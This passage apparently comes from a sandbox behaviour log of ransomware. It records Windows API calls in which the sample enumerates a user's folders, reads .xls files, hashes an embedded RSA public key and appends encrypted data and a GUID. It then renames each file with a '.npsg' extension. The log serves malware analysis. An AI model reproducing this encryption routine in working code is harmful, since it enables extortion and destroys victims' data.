hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.727] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.727] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.727] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0238.727] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.727] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.727] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.727] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.727] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.727] PathFindFileNameW (pszPath="") returned="" [0238.728] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.729] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.729] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0238.729] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0238.729] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.729] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.729] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.729] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\") returned="ZLJLwY4 p8u\\" [0238.730] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0238.730] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0238.730] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.730] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.730] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.730] PathFindFileNameW (pszPath="") returned="" [0238.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.733] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.733] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24856f50, ftCreationTime.dwHighDateTime=0x1d5b81b, ftLastAccessTime.dwLowDateTime=0xf5765cb0, ftLastAccessTime.dwHighDateTime=0x1d5bb8f, ftLastWriteTime.dwLowDateTime=0xf5765cb0, ftLastWriteTime.dwHighDateTime=0x1d5bb8f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gTnYqN V h", cAlternateFileName="GTNYQN~1")) returned 1 [0238.733] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb566a10, ftCreationTime.dwHighDateTime=0x1d5bc3e, ftLastAccessTime.dwLowDateTime=0xe897940, ftLastAccessTime.dwHighDateTime=0x1d5bc25, ftLastWriteTime.dwLowDateTime=0xe897940, ftLastWriteTime.dwHighDateTime=0x1d5bc25, nFileSizeHigh=0x0, nFileSizeLow=0x14a26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JbzecnSQFvFCFE.xls", cAlternateFileName="JBZECN~1.XLS")) returned 1 [0238.733] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\JbzecnSQFvFCFE.xls") returned=".xls" [0238.733] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\JbzecnSQFvFCFE.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\jbzecnsqfvfcfe.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.736] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=84518) returned 1 [0238.736] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.739] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.739] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.741] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x14a26, lpOverlapped=0x0) returned 1 [0238.742] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.742] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.742] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.742] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.744] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.744] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.744] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.744] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.744] GetLastError () returned 0x0 [0238.744] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.744] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.744] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.744] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.744] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.745] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.745] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14a26, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.745] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0238.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0238.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0238.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.746] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.746] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.746] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.746] CloseHandle (hObject=0x644) returned 1 [0238.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0238.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b88cd0 [0238.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8da60 | out: hHeap=0x620000) returned 1 [0238.748] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\JbzecnSQFvFCFE.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\jbzecnsqfvfcfe.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\JbzecnSQFvFCFE.xls.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\jbzecnsqfvfcfe.xls.npsg")) returned 1 [0238.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88cd0 | out: hHeap=0x620000) returned 1 [0238.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.750] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0238.751] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b49f220, ftCreationTime.dwHighDateTime=0x1d5bdbf, ftLastAccessTime.dwLowDateTime=0x7f4046c0, ftLastAccessTime.dwHighDateTime=0x1d5bce1, ftLastWriteTime.dwLowDateTime=0x7f4046c0, ftLastWriteTime.dwHighDateTime=0x1d5bce1, nFileSizeHigh=0x0, nFileSizeLow=0xf138, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PqoFdTvR3ywtw967.xls", cAlternateFileName="PQOFDT~1.XLS")) returned 1 [0238.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0238.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.752] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\PqoFdTvR3ywtw967.xls") returned=".xls" [0238.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\PqoFdTvR3ywtw967.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\pqofdtvr3ywtw967.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.752] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=61752) returned 1 [0238.752] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.755] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf112, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.755] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.757] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.757] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf138, lpOverlapped=0x0) returned 1 [0238.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.758] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.758] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.759] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.760] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.760] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.760] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.760] GetLastError () returned 0x0 [0238.760] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.760] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.760] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.760] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.760] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf140) returned 0x3b95d50 [0238.761] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86168 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b60 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b861b0 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400b78 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ba8 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400bc0 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.761] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0238.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ba8 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400bc0 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c08 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c08 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400bc0 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400ba8 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.762] RtlAllocateHeap 